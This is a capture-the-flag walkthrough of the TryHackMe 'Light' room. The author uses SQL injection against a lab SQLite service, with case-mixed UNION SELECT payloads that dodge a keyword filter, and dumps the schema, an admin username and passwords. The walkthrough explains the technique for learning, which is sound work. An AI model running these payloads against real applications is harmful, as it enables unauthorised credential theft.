Light - TryHackMe - Walkthrough
Exploit a database.
Description
I am working on a database application called Light! Would you like to try it out?
If so, the application is running on port 1337. You can connect to it usingnc 10.10.16.96 1337
You can use the usernamesmokeyin order to get started.Note: Please allow the service 2 - 3 minutes to fully start before connecting to it.
The challenge is rated as easy and can be found there -> https://tryhackme.com/r/room/lightroom.
Exploitation
As the description said, we first need to connect to the light database service. Then I inputted the username, which was given in the description, we got a password, interesting.
The next thing I did is testing for SQL injection because this is a database application. I tried double and single quotes.
1
2
3
4
Please enter your username: "
Username not found.
Please enter your username: '
Error: unrecognized token: "''' LIMIT 30"
The single quote looks promising. So I next tired to get the first entry of the table.
1
2
Please enter your username: admin' OR 1=1 --
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
We are restricted to don’t use --, this shouldn’t be a problem. I next tried to get the number of columns.
1
2
Please enter your username: ' UNION SELECT 1 '
Ahh there is a word in there I don't like :(
Looks like our SELECT or UNION isn’t accepted, that is why I next tried something like sElEcT and SELEct instead of SELECT and UNION. With that we finally get our desired output.
1
2
Please enter your username: ' UNIon SELEct 1 '
Password: 1
Next we can check if we can retrieve a database version. I used this payload.
1
2
Please enter your username: ' UNIon SELEct database() '
Error: no such function: database
Apparently this is not a MySQL/MariaDB database, this is why I next used the following query which is made for SQLite, as the challenge name already hints, this could be a ‘Light’ database.
1
2
3
4
5
Please enter your username: ' UniON selEct sql FROm sqlite_master '
Password: CREATE TABLE admintable (
id INTEGER PRIMARY KEY,
username TEXT,
password INTEGER)
Why this query works
The query which retrieves the password from the table looks something like this:
We input the SQL injection payload into the username where field. If we terminate the field with a single quote (
') and add aUNIONand aSELECTstatement, we can select data, after that we need to close the query that it won’t error with a single quote. We can simply close the single quote and get the data of theSELECT, that way we don’t need a termination string, this is just howSQLitehandles the query. The empty string is interpreted as an alias.
Only if we add a comma between
<Anything>and the string (''), we get the column error:left and right of UNION do not have the same number of result columns. This is because now we have two columns in this query.Note: I tested these queries on my local machine for understanding the way these queries are processed.
This gave me the whole table information, with that I next tried to extract the first entry of the table:
1
2
Please enter your username: ' UniON selEct username FROm admintable '
Password: [REDACTEDAdminUserREDACTED]
This gave use the asked username, and we can also try to extract the first password.
1
2
Please enter your username: ' UniON selEct password FROm admintable '
Password: THM{THIS_IS_NOT_VALID_FLAG}
Lastly the question is to get the admin password. For that I simply appended a where statement to select the admin user.
1
2
Please enter your username: ' UniON selEct password FROm admintable where username='TryHackMeAdmin' OR '
Password: DEMOPASSWORDREDACTED
With some tricks and some obfuscation of your payload you can easily solve this challenge.
I really enjoyed this challenge.